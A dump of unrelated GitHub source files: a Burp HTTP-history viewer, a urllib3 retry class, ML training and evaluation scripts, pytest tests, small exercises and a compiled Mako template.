flags=imgui.TREE_NODE_DEFAULT_OPEN\n )\n if show_response_json: \n if imgui.radio_button('Minify Response JSON', response_json_min):\n response_json_min = not response_json_min\n update_data()\n imgui.same_line()\n if imgui.button('Copy Response Data (JSON)'):\n glfw.set_clipboard_string(None, response_json)\n with imgui.font(tc_font):\n imgui.input_text_multiline(\n '##response json', response_json,\n len(response_json.encode('utf-8')) + 2, -1, height=-1,\n flags=imgui.INPUT_TEXT_READ_ONLY\n )\n imgui.columns(1)\n imgui.end()\n\n gl.glClearColor(1., 1., 1., 1)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT)\n\n imgui.render()\n impl.render(imgui.get_draw_data())\n glfw.swap_buffers(window)\n\n impl.shutdown()\n glfw.terminate()\n\n\ndef impl_glfw_init():\n width, height = 1920, 1000\n window_name = \"Burp Suite HTTP History Viewer for MLTD\"\n\n if not glfw.init():\n print(\"Could not initialize OpenGL context\")\n exit(1)\n\n # OS X supports only forward-compatible core profiles from 3.2\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, gl.GL_TRUE)\n\n # Create a windowed mode window and its OpenGL context\n window = glfw.create_window(\n int(width), int(height), window_name, None, None\n )\n glfw.make_context_current(window)\n\n if not window:\n glfw.terminate()\n print(\"Could not initialize Window\")\n exit(1)\n\n return window\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RainbowUnicorn7297/mltd-relive","sub_path":"tools/burp-viewer.py","file_name":"burp-viewer.py","file_ext":"py","file_size_in_byte":10469,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"73"} +{"seq_id":"26090126394","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\requests\\packages\\urllib3\\util\\retry.py\nfrom __future__ import absolute_import\nimport time\nimport logging\nfrom ..exceptions import ConnectTimeoutError, MaxRetryError, ProtocolError, ReadTimeoutError, ResponseError\nfrom ..packages import six\nlog = logging.getLogger(__name__)\n\nclass Retry(object):\n DEFAULT_METHOD_WHITELIST = frozenset(['HEAD',\n 'GET',\n 'PUT',\n 'DELETE',\n 'OPTIONS',\n 'TRACE'])\n BACKOFF_MAX = 120\n\n def __init__(self, total = 10, connect = None, read = None, redirect = None, method_whitelist = DEFAULT_METHOD_WHITELIST, status_forcelist = None, backoff_factor = 0, raise_on_redirect = True, raise_on_status = True, _observed_errors = 0):\n self.total = total\n self.connect = connect\n self.read = read\n if redirect is False or total is False:\n redirect = 0\n raise_on_redirect = False\n self.redirect = redirect\n self.status_forcelist = status_forcelist or set()\n self.method_whitelist = method_whitelist\n self.backoff_factor = backoff_factor\n self.raise_on_redirect = raise_on_redirect\n self.raise_on_status = raise_on_status\n self._observed_errors = _observed_errors\n\n def new(self, **kw):\n params = dict(total=self.total, connect=self.connect, read=self.read, redirect=self.redirect, method_whitelist=self.method_whitelist, status_forcelist=self.status_forcelist, backoff_factor=self.backoff_factor, raise_on_redirect=self.raise_on_redirect, raise_on_status=self.raise_on_status, _observed_errors=self._observed_errors)\n params.update(kw)\n return type(self)(**params)\n\n @classmethod\n def from_int(cls, retries, redirect = True, default = None):\n if retries is None:\n retries = default if default is not None else cls.DEFAULT\n if isinstance(retries, Retry):\n return retries\n redirect = bool(redirect) and None\n new_retries = cls(retries, redirect=redirect)\n log.debug('Converted retries value: %r -> %r', retries, new_retries)\n return new_retries\n\n def get_backoff_time(self):\n if self._observed_errors <= 1:\n return 0\n backoff_value = self.backoff_factor * 2 ** (self._observed_errors - 1)\n return min(self.BACKOFF_MAX, backoff_value)\n\n def sleep(self):\n backoff = self.get_backoff_time()\n if backoff <= 0:\n return\n time.sleep(backoff)\n\n def _is_connection_error(self, err):\n return isinstance(err, ConnectTimeoutError)\n\n def _is_read_error(self, err):\n return isinstance(err, (ReadTimeoutError, ProtocolError))\n\n def is_forced_retry(self, method, status_code):\n if self.method_whitelist and method.upper() not in self.method_whitelist:\n return False\n return self.status_forcelist and status_code in self.status_forcelist\n\n def is_exhausted(self):\n retry_counts = (self.total,\n self.connect,\n self.read,\n self.redirect)\n retry_counts = list(filter(None, retry_counts))\n if not retry_counts:\n return False\n return min(retry_counts) < 0\n\n def increment(self, method = None, url = None, response = None, error = None, _pool = None, _stacktrace = None):\n if self.total is False and error:\n raise six.reraise(type(error), error, _stacktrace)\n total = self.total\n if total is not None:\n total -= 1\n _observed_errors = self._observed_errors\n connect = self.connect\n read = self.read\n redirect = self.redirect\n cause = 'unknown'\n if error and self._is_connection_error(error):\n if connect is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif connect is not None:\n connect -= 1\n _observed_errors += 1\n elif error and self._is_read_error(error):\n if read is False:\n raise six.reraise(type(error), error, _stacktrace)\n elif read is not None:\n read -= 1\n _observed_errors += 1\n elif response and response.get_redirect_location():\n if redirect is not None:\n redirect -= 1\n cause = 'too many redirects'\n else:\n _observed_errors += 1\n cause = ResponseError.GENERIC_ERROR\n if response and response.status:\n cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status)\n new_retry = self.new(total=total, connect=connect, read=read, redirect=redirect, _observed_errors=_observed_errors)\n if new_retry.is_exhausted():\n raise MaxRetryError(_pool, url, error or ResponseError(cause))\n log.debug(\"Incremented Retry for (url='%s'): %r\", url, new_retry)\n return new_retry\n\n def __repr__(self):\n return '{cls.__name__}(total={self.total}, connect={self.connect}, read={self.read}, redirect={self.redirect})'.format(cls=type(self), self=self)\n\n\nRetry.DEFAULT = Retry(3)\n","repo_name":"connoryang/1v1dec","sub_path":"requests/packages/urllib3/util/retry.py","file_name":"retry.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10860508473","text":"import time\nimport joblib\nimport os\nimport os.path as osp\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom spinup import EpochLogger\nfrom spinup.utils.logx import restore_tf_graph\n\nfrom robolearn_gym_envs.pybullet import CentauroTrayEnv\nfrom robolearn.envs.normalized_box_env import NormalizedBoxEnv\n\nTend = 10.0 # Seconds\n\nSIM_TIMESTEP = 0.01\nFRAME_SKIP = 1\nDT = SIM_TIMESTEP * FRAME_SKIP\n\nPATH_LENGTH = int(np.ceil(Tend / DT))\nPATHS_PER_EPOCH = 1\nPATHS_PER_EVAL = 2\nBATCH_SIZE = 128\n\nSEED = 1010\n# NP_THREADS = 6\n\nSUBTASK = None\n\n\ndef load_policy(fpath, itr='last', deterministic=False):\n # handle which epoch to load from\n if itr == 'last':\n saves = [int(x[11:])\n for x in os.listdir(fpath)\n if 'simple_save' in x and len(x) > 11]\n itr = '%d' % max(saves) if len(saves) > 0 else ''\n else:\n itr = '%d' % itr\n\n # load the things!\n sess = tf.Session()\n model = restore_tf_graph(sess, osp.join(fpath, 'simple_save'+itr))\n\n # get the correct op for executing actions\n if deterministic and 'mu' in model.keys():\n # 'deterministic' is only a valid option for SAC policies\n print('Using deterministic action op.')\n action_op = model['mu']\n else:\n print('Using default action op.')\n action_op = model['pi']\n\n # make function for producing an action given a single state\n get_action = lambda x: \\\n sess.run(action_op, feed_dict={model['x']: x[None, :]})[0]\n\n return get_action\n\n\ndef run_policy(env, policy, max_ep_len=None, num_episodes=100, render=True):\n\n logger = EpochLogger()\n obs, reward, done, ep_ret, ep_len, n = env.reset(), 0, False, 0, 0, 0\n while n < num_episodes:\n if render:\n env.render()\n time.sleep(1e-3)\n\n action = policy(obs)\n obs, reward, done, _ = env.step(action)\n ep_ret += reward\n ep_len += 1\n\n if done or (ep_len == max_ep_len):\n logger.store(EpRet=ep_ret, EpLen=ep_len)\n print('Episode %d \\t EpRet %.3f \\t EpLen %d' % (n, ep_ret, ep_len))\n obs, reward, done, ep_ret, ep_len = env.reset(), 0, False, 0, 0\n n += 1\n\n logger.log_tabular('EpRet', with_min_and_max=True)\n logger.log_tabular('EpLen', average_only=True)\n logger.dump_tabular()\n\n\ndef load_env(render=True):\n\n env_params = dict(\n is_render=True,\n # obs_distances=False,\n obs_distances=True,\n obs_with_img=False,\n # obs_with_ori=True,\n active_joints='RA',\n control_mode='joint_tasktorque',\n # _control_mode='torque',\n balance_cost_weight=1.0,\n fall_cost_weight=1.0,\n tgt_cost_weight=3.0,\n # tgt_cost_weight=50.0,\n balance_done_cost=0., # 2.0*PATH_LENGTH, # TODO: dont forget same balance weight\n tgt_done_reward=0., # 20.0,\n ctrl_cost_weight=1.0e-1,\n use_log_distances=True,\n log_alpha_pos=1e-4,\n log_alpha_ori=1e-4,\n goal_tolerance=0.05,\n min_obj_height=0.60,\n max_obj_height=1.20,\n max_obj_distance=0.20,\n max_time=None,\n sim_timestep=SIM_TIMESTEP,\n frame_skip=FRAME_SKIP,\n subtask=SUBTASK,\n random_init=True,\n seed=SEED,\n )\n\n env = NormalizedBoxEnv(\n CentauroTrayEnv(**env_params),\n # normalize_obs=True,\n normalize_obs=False,\n online_normalization=False,\n obs_mean=None,\n obs_var=None,\n obs_alpha=0.001,\n )\n\n return env\n\n\ndef main(args):\n policy = load_policy(args.dir, deterministic=args.deterministic)\n env = load_env(render=not args.norender)\n\n run_policy(env, policy, args.horizon, args.episodes, not args.norender)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('dir', type=str, default='.',\n help='path to the tf directory')\n parser.add_argument('--horizon', '-H', type=int, default=1000)\n parser.add_argument('--episodes', '-n', type=int, default=100)\n parser.add_argument('--deterministic', '-d', action='store_true')\n parser.add_argument('--norender', '-nr', action='store_true')\n args = parser.parse_args()\n\n main(args)\n input('Press a key to close script')\n","repo_name":"domingoesteban/robolearn","sub_path":"examples/rl_algos/spinningup/centauro/load_sac.py","file_name":"load_sac.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"34424902938","text":"from collections import defaultdict\nimport sys\n\nNUM_BUCKETS = 50\n\n\nclass DeadlineAssigner:\n def __init__(self, buckets):\n self.buckets = buckets\n\n @staticmethod\n def load_from_file(filename):\n num_packets_to_fct = defaultdict(list)\n\n with open(filename) as deadlines_file:\n for line in deadlines_file:\n num_packets, flow_duration, *_ = line.split()\n num_packets_to_fct[float(num_packets)].append(float(flow_duration))\n\n num_packets_fcts = sorted(num_packets_to_fct.items())\n num_total_flows = sum(len(fcts) for _, fcts in num_packets_fcts)\n\n min_flows_in_a_bucket = num_total_flows // NUM_BUCKETS\n\n buckets = []\n current_num_packets = None\n current_bucket = []\n for num_packets, fcts in num_packets_fcts:\n current_num_packets = num_packets\n current_bucket.extend(fcts)\n if len(current_bucket) >= min_flows_in_a_bucket:\n buckets.append((current_num_packets, max(current_bucket)))\n current_num_packets = None\n current_bucket = []\n\n if current_num_packets is not None:\n buckets.append((current_num_packets, max(current_bucket)))\n\n return DeadlineAssigner(buckets)\n\n def get_deadline(self, num_packets):\n i_upper = 0\n while i_upper < len(self.buckets) - 1 and self.buckets[i_upper][0] < num_packets:\n i_upper += 1\n return self.buckets[i_upper][1]\n\n\ndef count_satisfied_deadlines(deadline_assigner: DeadlineAssigner, flow_stat_filename: str):\n total = 0\n satisfied = 0\n with open(flow_stat_filename) as f:\n for line in f:\n num_packets, fct, *_ = line.strip().split()\n num_packets = float(num_packets)\n fct = float(fct)\n\n total += 1\n if fct <= deadline_assigner.get_deadline(num_packets):\n satisfied += 1\n\n print(f'{satisfied}/{total}')\n\n\nif __name__ == '__main__':\n ideal_deadlines_filename = sys.argv[1]\n flow_stat_filename = sys.argv[2]\n count_satisfied_deadlines(DeadlineAssigner.load_from_file(ideal_deadlines_filename), flow_stat_filename)\n\n\n\n\n\n\n","repo_name":"hotnets2019/submission","sub_path":"PIAS-NS2/scripts/analyze_deadlines.py","file_name":"analyze_deadlines.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"2376592720","text":"from . import (\n get_result,\n)\nimport pytest\n\n\n@pytest.mark.asyncio\n@pytest.mark.resolver_test_group(\"activate_root\")\n@pytest.mark.parametrize(\n (\"group_name\", \"root_id\"),\n (\n (\n \"group1\",\n \"63298a73-9dff-46cf-b42d-9b2f01a56690\",\n ),\n (\n \"group2\",\n \"83cadbdc-23f3-463a-9421-f50f8d0cb1e5\",\n ),\n (\n \"group2\",\n \"eee8b331-98b9-4e32-a3c7-ec22bd244ae8\",\n ),\n ),\n)\nasync def test_activate_root(\n populate: bool, group_name: str, root_id: str\n) -> None:\n assert populate\n result = await get_result(\n email=\"admin@gmail.com\", group_name=group_name, identifier=root_id\n )\n assert \"errors\" not in result\n assert result[\"data\"][\"activateRoot\"][\"success\"]\n\n\n@pytest.mark.asyncio\n@pytest.mark.resolver_test_group(\"activate_root\")\n@pytest.mark.parametrize(\n (\"group_name\", \"root_id\"),\n (\n (\n \"group2\",\n \"702b81b3-d741-4699-9173-ecbc30bfb0cb\",\n ),\n (\n \"group1\",\n \"44db9bee-c97d-4161-98c6-f124d7dc9a41\",\n ),\n (\n \"group1\",\n \"bd4e5e66-da26-4274-87ed-17de7c3bc2f1\",\n ),\n ),\n)\nasync def test_activate_root_fail(\n populate: bool,\n group_name: str,\n root_id: str,\n) -> None:\n assert populate\n result = await get_result(\n email=\"admin@gmail.com\", group_name=group_name, identifier=root_id\n )\n assert \"errors\" in result\n assert result[\"errors\"][0][\"message\"] == \"Access denied\"\n","repo_name":"cognettings/vulscanner","sub_path":"integrates/back/test/functional/src/activate_root/test_resolver.py","file_name":"test_resolver.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"36977104997","text":"filename = \"wimbledon.csv\"\n\n\ndef main():\n data = load_data()\n display_winners_count(data)\n display_winning_countries(data)\n\n\ndef load_data():\n with open(filename, \"r\", encoding=\"utf-8-sig\") as in_file:\n in_file.readline()\n data = [data.strip() for data in in_file.readlines()]\n return data\n\n\ndef display_winners_count(data):\n winners = [record.split(\",\")[2] for record in data]\n\n winner_to_count = {}\n for winner in winners:\n winner_to_count[winner] = winner_to_count.get(winner, 0) + 1\n\n max_length = max(len(winner) for winner in list(winner_to_count.keys()))\n\n print(\"Wimbledon Champions:\")\n for winner, count in winner_to_count.items():\n print(f\"{winner:{max_length}} : {count:>3}\")\n\n\ndef display_winning_countries(data):\n countries = sorted(set([record.split(\",\")[1] for record in data]))\n print(f\"\\nThese {len(countries)} countries have won Wimbledon:\")\n print(\", \".join(countries))\n\n\nmain()\n","repo_name":"Brennen12/cp1404practicals","sub_path":"prac_05/wimbledon.py","file_name":"wimbledon.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24045212602","text":"import pandas as pd\nimport os\n\ndef write_confusion_matrix(file_name, conf_matrix):\n \"\"\"\n Gets filename and confusion matrix returned by the model to create a table of TP, FP, TN, and FN \n for each class and write them in a pickle file.\n\n Parameters\n ----------\n file_name : str\n File name specified by the user\n conf_matrix : numpy.ndarray\n A three dimensional array that includes the TP, NP, FP, FN for each class.\n\n Returns\n -------\n None\n\n \"\"\"\n \n file_path = './confusion_pkls/' + file_name\n\n l = [{\n 'class': i,\n 'TN': label[0][0],\n 'FN': label[0][1],\n 'TP': label[1][0],\n 'FP': label[1][1]}\n for i,label in enumerate(conf_matrix)]\n \n if not os.path.isfile(file_path):\n df = pd.DataFrame(l)\n df.to_pickle(file_path)\n else:\n df = pd.read_pickle(file_path)\n data = l\n \n df.append(data, ignore_index=True)\n\n os.remove(file_path)\n df.to_pickle(file_path)\n\ndef write_results(scores, file_name, model_name, plot_type, freeze, max_length):\n \"\"\"\n Creates a table of F1 scores, Hamming Loss along with the model, the plot source it was trained on, \n whether it was trained, and the maximum token length in a table. It then stores the results in a pickle \n file.\n\n Parameters\n ----------\n scores : dict\n Consists of F1 Macro/Micro and Hamming Loss.\n file_name : str\n File name specified by the user.\n model_name : str\n The model used for encoding.\n plot_type : str\n The plot source used to carry out the training process.\n freeze : bool\n Whether the model was fine-tuned.\n max_length : int\n The maximum length of the input tokens.\n\n Returns\n -------\n None.\n\n \"\"\"\n\n file_path = './result_pkls/' + file_name\n\n if not os.path.isfile(file_path):\n score_dict = {'Model Name': [], 'Plot Source': [], 'F1 Macro': [], \n 'F1 Micro': [], 'Hamming Loss': [], 'Freeze?': [], 'Max Length': []}\n \n score_dict['Model Name'].append(model_name)\n score_dict['Plot Source'].append(plot_type)\n score_dict['Freeze?'].append(freeze)\n score_dict['Max Length'].append(max_length)\n score_dict['F1 Macro'].append(scores['eval_f1_macro'])\n score_dict['F1 Micro'].append(scores['eval_f1_micro'])\n score_dict['Hamming Loss'].append(scores['eval_hamming_loss'])\n\n df = pd.DataFrame(score_dict)\n df.to_pickle(file_path)\n\n else:\n\n df = pd.read_pickle(file_path)\n data = {'Model Name': model_name, 'Plot Source': plot_type, 'F1 Macro': scores['eval_f1_macro'], \n 'F1 Micro': scores['eval_f1_micro'], 'Hamming Loss': scores['eval_hamming_loss'], 'Freeze?': freeze,\n 'Max Length': max_length}\n \n df.append(data, ignore_index=True)\n\n os.remove(file_path)\n df.to_pickle(file_path)\n \n return('Results are saved in {}'.format(file_path))","repo_name":"seeinggreen/mlpcw","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35338023596","text":"from website import create_app\nimport socket\nimport os\n\napp = create_app()\n\nif __name__ == '__main__':\n gw = os.popen(\"ip -4 route show default\").read().split()\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((gw[2], 0))\n ipaddr = s.getsockname()[0]\n app.run(host=ipaddr, debug=True)\n print(ipaddr)\n","repo_name":"bigbrainbrian7/Flask-Web-App-Tutorial","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3380853031","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 30 18:04:05 2023\n\ncompute downstream Mach number for nonideal flow\n\n@author: yan\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\n\nnc = 10\ncolors = plt.cm.tab20(np.linspace(0, 1, nc))\nwh = 0.02\n\nfig1 = plt.figure( dpi=300)\nlwh = 2\naxes = fig1.add_axes([0.15, 0.15, 0.7, 0.7]) #size of figure\n\nzt = [0.6,0.7,0.8,0.9]\nzt1 = [item - 0.01 for item in zt]\nzt2 = [item + 0.01 for item in zt]\nmaxdiff_mm = [ 3, 1.5, 1.2, 0.5] \nmaxdiff_mdm = [ 0.5, 0.4, 0.35, 0.25] \n\nplt.bar(zt1,maxdiff_mm,color=colors[0], width = wh,label=\"$MM$\")\nplt.bar(zt2,maxdiff_mdm,color=colors[1], width = wh,label=\"$MDM$\")\nplt.xticks(np.arange(min(zt), max(zt)+1, 0.1))\n\naxes.set_xlim([0.55, 0.95])\naxes.set_xlabel('$Z_t$',fontsize=12)\naxes.set_ylabel('$(\\Delta M_2)_{\\max}\\%$',fontsize=12) \n# axes.set_title('$Z_t = 0.9$',fontsize=14)\naxes.legend(loc=0 , prop={'size': 10}) # \nfig1.savefig(\"mm_mdm.eps\")\n\n\n##############################################################\nfig2 = plt.figure( dpi=300)\nlwh = 2\naxes = fig2.add_axes([0.15, 0.15, 0.7, 0.7]) #size of figure\n\nzt = [0.6,0.7,0.8,0.9]\nzt1 = [item - 0.01 for item in zt]\nzt2 = [item + 0.01 for item in zt]\n\n# maxdiff_mm = [1.0,3.0,6.0,9.2] \nmaxdiff_d4 = [ 2.0, 1.75, 0.8, 0.5, ] \nmaxdiff_d6 = [ 1.0, 0.7,0.6,0.2] \n\nplt.bar(zt1,maxdiff_d4,color=colors[0], width = wh,label=\"$D4$\")\nplt.bar(zt2,maxdiff_d6,color=colors[1], width = wh,label=\"$D6$\")\nplt.xticks(np.arange(min(zt), max(zt)+1, 0.1))\n\naxes.set_xlim([0.55, 0.95])\naxes.set_xlabel('$Z_t$',fontsize=12)\naxes.set_ylabel('$(\\Delta M_2)_{\\max}\\%$',fontsize=12) \n# axes.set_title('$Z_t = 0.9$',fontsize=14)\naxes.legend(loc=0 , prop={'size': 10}) # \nfig2.savefig(\"d4_d6.eps\")\n\n\n\n\n\n\n","repo_name":"PENGYAN777/PM_fans","sub_path":"complexity/siloxanes/plot_all.py","file_name":"plot_all.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42392968083","text":"from numpy.random import seed\nseed(8) #1\nfrom tensorflow import set_random_seed\nset_random_seed(7) #2\n\n#\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\n\nfrom tensorflow.keras import backend as K\nfrom tensorflow.keras.models import Model ,load_model\nfrom tensorflow.keras.layers import Flatten, Dense, Dropout\nfrom tensorflow.keras.applications.inception_resnet_v2 import InceptionResNetV2, preprocess_input\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.applications.vgg16 import decode_predictions\nfrom keras.applications.vgg16 import VGG16\nfrom tensorflow.keras.optimizers import Adam, RMSprop\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nimport numpy as np\nimport tensorflow as tf\nfrom keras import models\nfrom keras import layers\nfrom keras.applications import VGG16\nfrom keras import optimizers\n\n\n\nIMAGE_SIZE = (150, 150)\nNUM_CLASSES = len(data_list)\nBATCH_SIZE = 10 # try reducing batch size or freeze more layers if your GPU runs out of memory\nNUM_EPOCHS = 20\nLEARNING_RATE =0.0005 #start off with high rate first 0.001 #5e-4\n\n\n\ndef setup_dataset(DATASET_PATH):\n\t#Train datagen here is a preprocessor\n\ttrain_datagen = ImageDataGenerator(rescale=1./255,\n\t rotation_range=50,\n\t featurewise_center = True,\n\t featurewise_std_normalization = True,\n\t width_shift_range=0.2,\n\t height_shift_range=0.2,\n\t shear_range=0.25,\n\t zoom_range=0.1,\n\t zca_whitening = True,\n\t channel_shift_range = 20,\n\t horizontal_flip = True ,\n\t vertical_flip = True ,\n\t validation_split = 0.2,\n\t fill_mode='constant')\n\n\t# test_datagen = ImageDataGenerator(preprocessing_function=preprocess_input,\n\t# fill_mode='constant')\n\n\ttrain_batches = train_datagen.flow_from_directory(DATASET_PATH,\n\t target_size=IMAGE_SIZE,\n\t shuffle=True,\n\t batch_size=BATCH_SIZE,\n\t subset = \"training\",\n\t seed=42,\n\t class_mode=\"binary\",\n\t \n\t )\n\n\tvalid_batches = train_datagen.flow_from_directory(DATASET_PATH,\n\t target_size=IMAGE_SIZE,\n\t shuffle=True,\n\t batch_size=BATCH_SIZE,\n\t subset = \"validation\",\n\t seed=42,\n\t class_mode=\"binary\",\n\t \n\t \n\t )\n\n\n\n\n\ndef run(model_name, backbone, dataset_name):\n\tprint(\"model name : \"+model_name)\n\tprint(\"backbone : \"+backbone)\n\tprint(\"dataset name : \"+dataset_name)\n\tprint(\"training\")\n\n\tdataaset_path = './data/' + dataset_name + '/content/two/train'\n\tsetup_dataset(dataaset_path)\n\t\n\tconv_base = VGG16(weights='imagenet',\n include_top=False,\n input_shape=(150, 150, 3))\n\n\n\tconv_base.trainable = False\n\n\n\tmodel = models.Sequential()\n\tmodel.add(conv_base)\n\tmodel.add(layers.Flatten())\n\tmodel.add(layers.Dense(256, activation='relu'))\n\tmodel.add(layers.Dense(3, activation='softmax'))\n\n\n\tmodel.compile(loss='categorical_crossentropy',\n\t \n\t optimizer=optimizers.Adam(lr=LEARNING_RATE),\n\t metrics=['acc'])\n\n\n\n\n\t#FIT MODEL\n\tprint(len(train_batches))\n\tprint(len(valid_batches))\n\n\tSTEP_SIZE_TRAIN=train_batches.n//train_batches.batch_size\n\tSTEP_SIZE_VALID=valid_batches.n//valid_batches.batch_size\n\n\tresult=model.fit_generator(train_batches,\n\t steps_per_epoch =STEP_SIZE_TRAIN,\n\t validation_data = valid_batches,\n\t validation_steps = STEP_SIZE_VALID,\n\t epochs= NUM_EPOCHS, \n\t )\n\tmodel.save('Covid_Binary.h5')\n\n","repo_name":"shwetapan/Covid-19-Detection","sub_path":"modules/tf_model.py","file_name":"tf_model.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"37004994923","text":"# -*- coding:utf-8 -*-\nfrom mako import runtime, filters, cache\nUNDEFINED = runtime.UNDEFINED\nSTOP_RENDERING = runtime.STOP_RENDERING\n__M_dict_builtin = dict\n__M_locals_builtin = locals\n_magic_number = 10\n_modified_time = 1580297576.260314\n_enable_loop = True\n_template_filename = u'/home/css/edx-edutech/apps/edx/edx-platform/lms/templates/discussion/_discussion_inline.html'\n_template_uri = 'discussion/_discussion_inline.html'\n_source_encoding = 'utf-8'\n_exports = []\n\n\n\nfrom django.utils.translation import ugettext as _\nfrom json import dumps as json_dumps\nfrom openedx.core.djangolib.js_utils import js_escaped_string\n\n\ndef render_body(context,**pageargs):\n __M_caller = context.caller_stack._push_frame()\n try:\n __M_locals = __M_dict_builtin(pageargs=pageargs)\n can_create_subcomment = context.get('can_create_subcomment', UNDEFINED)\n display_name = context.get('display_name', UNDEFINED)\n discussion_target = context.get('discussion_target', UNDEFINED)\n discussion_category = context.get('discussion_category', UNDEFINED)\n can_create_thread = context.get('can_create_thread', UNDEFINED)\n user = context.get('user', UNDEFINED)\n login_msg = context.get('login_msg', UNDEFINED)\n can_create_comment = context.get('can_create_comment', UNDEFINED)\n course_id = context.get('course_id', UNDEFINED)\n discussion_id = context.get('discussion_id', UNDEFINED)\n __M_writer = context.writer()\n __M_writer(u'\\n\\n')\n runtime._include_file(context, u'_underscore_templates.html', _template_uri)\n __M_writer(u'\\n')\n runtime._include_file(context, u'_thread_list_template.html', _template_uri)\n __M_writer(u'\\n\\n')\n __M_writer(u'\\n\\n
\\n')\n if not user.is_authenticated:\n __M_writer(u'
\\n
\\n \\n
')\n __M_writer(filters.html_escape(filters.decode.utf8(login_msg)))\n __M_writer(u'
\\n
\\n
\\n
\\n')\n __M_writer(u'
\\n

')\n __M_writer(filters.html_escape(filters.decode.utf8(_(display_name))))\n __M_writer(u'

\\n
')\n __M_writer(filters.html_escape(filters.decode.utf8(_(\"Topic:\"))))\n __M_writer(u' ')\n __M_writer(filters.html_escape(filters.decode.utf8(discussion_category)))\n __M_writer(u'\\n')\n if discussion_target:\n __M_writer(u' / ')\n __M_writer(filters.html_escape(filters.decode.utf8(discussion_target)))\n __M_writer(u'\\n')\n __M_writer(u'
\\n
\\n \\n\\n
\\n\\n')\n return ''\n finally:\n context.caller_stack._pop_frame()\n\n\n\"\"\"\n__M_BEGIN_METADATA\n{\"source_encoding\": \"utf-8\", \"line_map\": {\"16\": 6, \"22\": 1, \"37\": 1, \"38\": 3, \"39\": 3, \"40\": 4, \"41\": 4, \"42\": 10, \"43\": 12, \"44\": 12, \"45\": 13, \"46\": 13, \"47\": 14, \"48\": 14, \"49\": 15, \"50\": 15, \"51\": 16, \"52\": 17, \"53\": 20, \"54\": 20, \"55\": 25, \"56\": 26, \"57\": 26, \"58\": 27, \"59\": 27, \"60\": 27, \"61\": 27, \"62\": 28, \"63\": 29, \"64\": 29, \"65\": 29, \"66\": 31, \"67\": 34, \"68\": 34, \"69\": 35, \"70\": 35, \"71\": 36, \"72\": 36, \"73\": 41, \"74\": 41, \"80\": 74}, \"uri\": \"discussion/_discussion_inline.html\", \"filename\": \"/home/css/edx-edutech/apps/edx/edx-platform/lms/templates/discussion/_discussion_inline.html\"}\n__M_END_METADATA\n\"\"\"\n","repo_name":"lxp20201/lxp","sub_path":"edx-edutech/.tmp/mako_lms/d29c3d7f5a615bace280cb606b8bfd6f/discussion/_discussion_inline.html.py","file_name":"_discussion_inline.html.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40674254608","text":"# 3 = 1 + 2 = 2**0 + 2**1\n# 5 = 1 + 4 = 2**0 + 2**2\n# 2 = 2**1\n\nimport math\n\n\ndef help(N):\n M = 0\n ans = []\n\n while N > 0:\n res = math.log2(N)\n res = int(res)\n M = max(res, M)\n ans.append(res)\n N = N - 2**res\n\n M = M + 1\n ans = [str(M - a) for a in ans]\n\n return M, ans\n\n\nT = int(input())\nfor _ in range(T):\n N = int(input())\n M, ans = help(N)\n print(M)\n print(' '.join(ans))\n","repo_name":"LogicJake/code-for-interview","sub_path":"written-exam/4.27-拼多多-多多的细胞培养.py","file_name":"4.27-拼多多-多多的细胞培养.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"74728872876","text":"\"\"\"\nCreated to control Onvif Analitic service properties.\n\ncraeted by : enstns\ncreated time : 20.05.23\n\"\"\"\nimport logging\n\nfrom lib.onvif import OnvifService, get_caching_client\nfrom 